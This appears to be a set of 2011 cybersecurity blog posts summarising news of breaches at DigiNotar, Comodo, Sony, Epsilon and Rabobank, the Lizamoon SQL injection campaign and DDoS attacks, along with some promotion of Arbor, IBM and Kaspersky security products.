Cybersecurity
DigiNotar, GlobalSign targetted.
The recent hack targetting the Dutch Internet Trust Provider, DigiNotar, appears to have been politically motivated, according to the apparent hacker: https://twitter.com/#!/ichsunx2.
According to the interim, investigative report by Fox-IT, the infrastructure at DigiNotar included unpatched web servers, no server anti-virus protection, a weak domain administrator password and an intrusion prevention system which did not block the web server attacks. The full report can be found here.
By gaining access to these servers, the hacker was able to issue bogus digital certificates, which has serious implications to organisations offering secure web services and the users making use of these services. As a result, both Microsoft and Mozilla have revoked their trust in the DigiNotar Certificate Authority. Underlining the seriousness of this, Mozilla explain this as a “last resort” measure:
http://blog.mozilla.com/
As a precaution, another Certificate Authority, GlobalSign, has temporarily stopped issuing certificates following one of the first postings (http://pastebin.com/1AxH30em) by the apparent hacker. The BBC Tech website gives more details:
http://www.bbc.co.uk/news/technology-14819257
Rabobank targetted again.
Dutch bank Rabobank was this week targetted by a group known as the Conspiracy Cells of Fire, who launched a DDoS attack which brought its Internet Banking service down.
This again highlights the difficulty organisations have in detecting and blocking an attack that is based on the premise of using thousands, sometimes millions, of source machines to simultaneously send requests to a target server. Arbor Networks’ Peakflow SP TMS product provides both detection and mitigation of these attacks, primarily based on its ability to detect anomalies in network traffic and take action in real-time to block the necessary traffic. Previously the Arbor solution worked in conjunction with a Cisco or CheckPoint product to provide the detection and mitigation, respectively. Nowadays, Arbor has built the detection and mitigation into a single product.
For an even more complete security solution, the Arbor product could be deployed in conjunction with IBM Security Network IPS, for example.
Take a look at this video to gain a better understanding of the benefits of the Arbor Peakflow SP TMS product, as explained by one European customer.
Sony suffers second hacker attack.
04/05/11 07:41 Filed in: Cybersecurity
Sony has suffered another blow to its brand reputation after warning an additional 25 million customers may have had their details stolen in a newly discovered attack by hackers.
The electronics giant has now disabled a second online network, Sony Online Entertainment (SOE), that houses massive multiplayer online (MMO) and Facebook games, after it was found to have been hacked last month.
Sony says personal information of 24.6 million customers including passwords, direct debit records and birthdates may have been stolen in the hack, discovered by its engineers earlier this week.
The techniques used for both recent Sony hacks appear to have been straightforward SQL injection hacks to the Sony database, which could have easily been prevented with basic security measures including Web Application Protection and Data Leakage Prevention (DLP), both of which are available in IBM Security Network IPS.
http://www.totaltele.com/view.aspx?ID=464556
Sony hack.
27/04/11 07:18 Filed in: Cybersecurity
Sony has warned users of its PlayStation Network that their personal information, including credit card details, may have been stolen.
The company said that the data might have fallen into the hands of an "unauthorised person" following a hacking attack on its online service.
Access to the network was suspended last Wednesday, but Sony has only now revealed details of what happened.
Users are being warned to look out for attempted telephone and e-mail scams.
In a statement posted on the official PlayStation blog, Nick Caplin, the company's head of communications for Europe, said: "We have discovered that between April 17 and April 19 2011, certain PlayStation Network and Qriocity service user account information was compromised in connection with an illegal and unauthorized intrusion into our network”.
See also their FAQ page:
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
Epsilon attack - "biggest security breach in US history"
15/04/11 16:19 Filed in: Cybersecurity
The recent hack into Epsilon’s client database resulted in millions of client names and email addresses being stolen.
The suspicion is that this theft will lead to a spate of new spear phishing attacks.
http://personalmoneystore.com/moneyblog/2011/04/04/epsilon-database-hack-phishing-attacks/
Kaspersky Mobile Security 9
09/04/11 09:14 Filed in: Android | Cybersecurity | Windows Mobile | Symbian | Blackberry | Kaspersky
Kaspersky recently added support for Android and Blackberry to their Mobile Security 9 app, which was already supported on Windows Mobile and Symbian.
The nice thing about this app is that it has the ability to disable or clean a stolen smartphone, even if the SIM card has been replaced.
For the Symbian and Windows Mobile variants, you also have the ability to encrypt the data stored on your phone and deploy parental controls.
For a full list of features supported per Operating System, see:
http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
In addition to these paid apps, Kaspersky also has an excellent free iPhone app - ThreatPost - the Kaspersky Lab Security News Service.
Click on their logo below to see their website:
Woops... Rabobank Internet Banking slip-up
08/04/11 16:20 Filed in: Internet Banking | Cybersecurity
During routine maintenance work on its Internet Banking service yesterday, 900 clients of the Dutch bank Rabobank were able to see the bank account details of other account holders, while checking their own accounts on-line.
The problem was quickly rectified by Rabobank by restarting the service, during which time the Internet Banking service was temporarily off-line.
No rogue transactions were performed during the time that the fault occurred, according to Rabobank sources.
http://www.rtl.nl
DNS.be name servers target of botnet attack
05/04/11 19:03 Filed in: DDoS | Cybersecurity
DNS.be have just released a press statement regarding an ongoing botnet attack that started Sunday 4 April. The attackers and motives are as yet unknown.
http://blog.mxlab.eu/2011/04/05/2-dns-name-servers-of-dns-be-experienced-unusual-high-workload/
Lizamoon attack "most successful SQL injection attack ever"
I had just finished a presentation today on the very real need for web application protection to protect against SQL injection and Cross-Site Scripting attacks, when I came across the following two articles:
http://www.theregister.co.uk/2011/03/31/lizamoon_mass_injection_attack/
http://www.bbc.co.uk/news/technology-12933053
The attack injects a legitimate website with a link to a malicious site which, when accessed, loads a pop-up which attempts to get the site visitor to install a fake anti-malware product, pertaining to be from Microsoft.
To get an idea of how many sites have been compromised by the first wave of the attack, simply Google the following: “lizamoon[dot]com[slash]ur.php”.
As the attack spreads it has now been modified to inject links to other rogue domains hosting the same piece of malware.
Interview with ComodoHacker
30/03/11 20:49 Filed in: Comodo | Cybersecurity
After the recent distribution of nine fraudulent certificates, apparently by an Iranian hacker, Comodo released the following statement:
http://blogs.comodo.com/it-security/data-security/the-recent-ca-compromise/
Ex-ISS Chief Scientist Robert Graham interviews the ComodoHacker.
http://erratasec.blogspot.com/2011/03/interview-with-comodohacker.html
Mixed messages but a real threat.
25/03/11 07:56 Filed in: IT Security | Cybersecurity
The varying opinions on the real (versus perceived) threat of cyber-security and cyber-warfare remind me of the mixed messages we get about what is good and what is bad for us.
The only difference is that I need to click on “Health” instead of “Technology” on the BBC website.
Compare the following two articles, for example:
http://www.bbc.co.uk/news/technology-12473809
http://www.bbc.co.uk/news/world-europe-12840941
What are we up against?
With so many different terms around these days for the different types of malware that exist and the different types of attacks we are facing, I thought it would be a good idea to clarify the definitions of some of the more commonly used terms.
Check out: www.itsecurityunplugged.com.
By the way, today I am at the Brussels Expo @ www.infosecurity.be.